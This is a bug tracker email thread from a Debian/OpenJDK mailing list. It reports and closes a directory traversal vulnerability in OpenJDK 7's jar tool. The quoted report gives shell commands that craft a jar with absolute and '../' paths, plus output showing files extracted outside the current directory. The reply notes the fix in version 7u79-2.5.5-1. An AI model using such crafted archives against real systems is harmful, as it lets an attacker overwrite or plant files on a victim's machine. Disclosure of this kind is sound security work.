openjdk team mailing list archive

Thread
Date

Bug#774953: jar(1): directory traversal

To: Alexander Cherepanov <cherepan@xxxxxxxx>, 774953@xxxxxxxxxxxxxxx
From: Salvatore Bonaccorso <carnil@xxxxxxxxxx>
Date: Thu, 16 Apr 2015 06:31:49 +0200
In-reply-to: <54AFC6D9.1090405@mccme.ru>
Original-sender: Salvatore Bonaccorso <salvatore.bonaccorso@xxxxxxxxx>
Reply-to: Salvatore Bonaccorso <carnil@xxxxxxxxxx>, 774953@xxxxxxxxxxxxxxx
Resent-cc: OpenJDK Team <openjdk@xxxxxxxxxxxxxxxxxxx>
Resent-date: Thu, 16 Apr 2015 04:33:02 +0000
Resent-from: Salvatore Bonaccorso <carnil@xxxxxxxxxx>
Resent-message-id: <handler.774953.B774953.142915872030054@xxxxxxxxxxxxxxx>
Resent-to: debian-bugs-dist@xxxxxxxxxxxxxxxx
Sender: Salvatore Bonaccorso <salvatore.bonaccorso@xxxxxxxxx>
User-agent: Mutt/1.5.23 (2014-03-12)

Control: fixed -1  7u79-2.5.5-1

Hi,

On Fri, Jan 09, 2015 at 03:17:29PM +0300, Alexander Cherepanov wrote:
> Package: openjdk-7-jdk
> Version: 7u71-2.5.3-2
> Tags: security
> 
> jar(1) is susceptible to a directory traversal vulnerability. While
> extracting an archive, it will happily use absolute and relative paths taken
> from the archive. This can be exploited by a malicious archive to write
> files outside the current directory.
> 
> For example, let's create a sample archive:
> 
> $ mkdir Xtmp/ XX/
> $ touch Xtmp/abs XX/rel
> $ jar -cMvf test.jar Xtmp/abs XX/rel
> $ sed -i 's|Xtmp/|/tmp/|g;s|XX/|../|g' test.jar
> $ rm -r Xtmp/ XX/
> 
> and then test it:
> 
> $ ls /tmp/abs ../rel
> ls: cannot access /tmp/abs: No such file or directory
> ls: cannot access ../rel: No such file or directory
> 
> $ jar -xvf test.jar
> extracted: /tmp/abs
> extracted: ../rel
> 
> $ ls /tmp/abs ../rel
> ../rel  /tmp/abs
> 
> My `jar` points to /etc/alternatives/jar, which points to
> /usr/lib/jvm/java-7-openjdk-amd64/bin/jar .
> 
> Not sure if this is just CVE-2005-1080 not fixed or something else. But
> please note that CVE-2005-1080 talks about .. only.

This should be fixed with 7u79-2.5.5-1.

Regards,
Salvatore